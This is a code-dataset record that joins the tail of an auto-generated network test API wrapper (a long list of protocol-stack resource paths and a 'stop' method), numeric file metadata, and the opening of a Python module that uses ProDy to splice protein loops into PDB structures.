emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampCon
trolRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/prot
ocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolSta
ck/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/pr
otocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethern
et/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoP
ppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent REST API calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
# Positional args map to Arg2..ArgN; keyword args pass through by name.
for i, arg in enumerate(args): payload['Arg%s' % (i + 2)] = arg
for key, value in kwargs.items(): payload[key] = value
return self._execute('stop', payload=payload, response_object=None)
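# A minimal usage sketch for the generated stop wrapper above; `protocol_stack`
# is an assumed handle from an established session, not defined in this file.
# Positional args become Arg2..ArgN in the payload; keyword args pass by name:
# protocol_stack.stop(async_operation=True)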
| 154.711538
| 23,008
| 0.815009
| 6,847
| 64,360
| 7.637067
| 0.053892
| 0.244746
| 0.178004
| 0.097722
| 0.935725
| 0.927827
| 0.920598
| 0.91991
| 0.914918
| 0.908359
| 0
| 0.010243
| 0.071628
| 64,360
| 415
| 23,009
| 155.084337
| 0.864921
| 0.889093
| 0
| 0.219298
| 0
| 0
| 0.077131
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.026316
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 15b618682cd8f241492f5a55668d894316df55eb
| 12,103
| py
| Python
| combs_pub/apps/stitch_loop.py
| npolizzi/combs_pub
| a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
| ["MIT"] | null | null | null
| combs_pub/apps/stitch_loop.py
| npolizzi/combs_pub
| a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
| ["MIT"] | null | null | null
| combs_pub/apps/stitch_loop.py
| npolizzi/combs_pub
| a649d6104d7fb81cd75d9a838d630fda1ec5cc4e
| ["MIT"] | 2
| 2020-11-02T23:04:27.000Z
| 2021-07-11T16:41:36.000Z
|
import os
import prody as pr
import numpy as np
from .functions import writePDBStream
#query_sel_N = 'chain C and resnum 39to44'
#query_sel_C = 'chain D and resnum 4to12'
def paste_loop(path_to_loop, path_to_pdb, query_selection_N, query_selection_C, query_length_N=4, query_length_C=4,
include_sidechains=False):
"""Splice a loop into a pdb between the N- and C-side query selections; returns (pdb_N, loop_slice, pdb_C)."""
loop = pr.parsePDB(path_to_loop)
loop.setSegnames('A')
loop_bb = loop.select('backbone')
pdb = pr.parsePDB(path_to_pdb)
query_N = pdb.select(query_selection_N)
query_N_bb = query_N.select('name N C CA')
query_C = pdb.select(query_selection_C)
query_C_bb = query_C.select('name N C CA')
first_resnum_loop = loop_bb.getResnums()[0]
last_resnum_loop = loop_bb.getResnums()[-1]
loop_N_bb = loop_bb.select('name N C CA and resnum `' + str(first_resnum_loop) + 'to' + str(first_resnum_loop + query_length_N - 1) + '`')
loop_C_bb = loop_bb.select('name N C CA and resnum `' + str(last_resnum_loop - query_length_C + 1) + 'to' + str(last_resnum_loop) + '`')
try:
coords_diff_N = loop_N_bb.getCoords() - query_N_bb.getCoords()
coords_diff_C = loop_C_bb.getCoords() - query_C_bb.getCoords()
except ValueError:
# Mismatched atom counts between loop and query selections; bail out.
print('Loop failure')
return None, None, None
ind_match_N = np.argmin([np.linalg.norm(i) for i in coords_diff_N])
ind_match_C = np.argmin([np.linalg.norm(i) for i in coords_diff_C])
loop_N_bb_index = loop_N_bb.getIndices()[ind_match_N]
loop_C_bb_index = loop_C_bb.getIndices()[ind_match_C]
query_N_bb_index = query_N_bb.getIndices()[ind_match_N]
query_C_bb_index = query_C_bb.getIndices()[ind_match_C]
first_index_pdb = pdb.select('backbone').getIndices()[0]
last_index_pdb = pdb.select('backbone').getIndices()[-1]
loop_slice = loop_bb.select('index ' + str(loop_N_bb_index) + 'to' + str(loop_C_bb_index))
if not include_sidechains:
pdb_N = pdb.select('backbone and index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('backbone and index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
else:
pdb_N = pdb.select('index ' + str(first_index_pdb) + 'to' + str(query_N_bb_index - 1))
pdb_C = pdb.select('index ' + str(query_C_bb_index + 1) + 'to' + str(last_index_pdb))
return pdb_N, loop_slice, pdb_C
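# A usage sketch for paste_loop (paths and selections are illustrative, not from
# this file); the three returned selections feed print_loop_pdb below:
# pdb_N, loop_slice, pdb_C = paste_loop('loop.pdb', 'scaffold.pdb',
#                                       'chain C and resnum 39to44',
#                                       'chain D and resnum 4to12')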
def print_loop_pdb(pdb_Ns, loop_slices, pdb_Cs, outdir, keep_resnames=False, keep_ligand=True, original_pdb=None):
"""pdb_Ns, loop_slices, pdb_Cs are lists that should be in order of increasing residue number (i.e., N to C)"""
if outdir[-1] != '/':
outdir += '/'
os.makedirs(outdir, exist_ok=True)
with open(outdir + repr(pdb_Ns[0]).split()[-3] + '_loops.pdb', 'w') as outfile:
l = len(loop_slices)
pdbC_first_index = pdb_Ns[0].getIndices()[0]
pdbN_first_index_resnum = 0
loop_last_resnum = -1
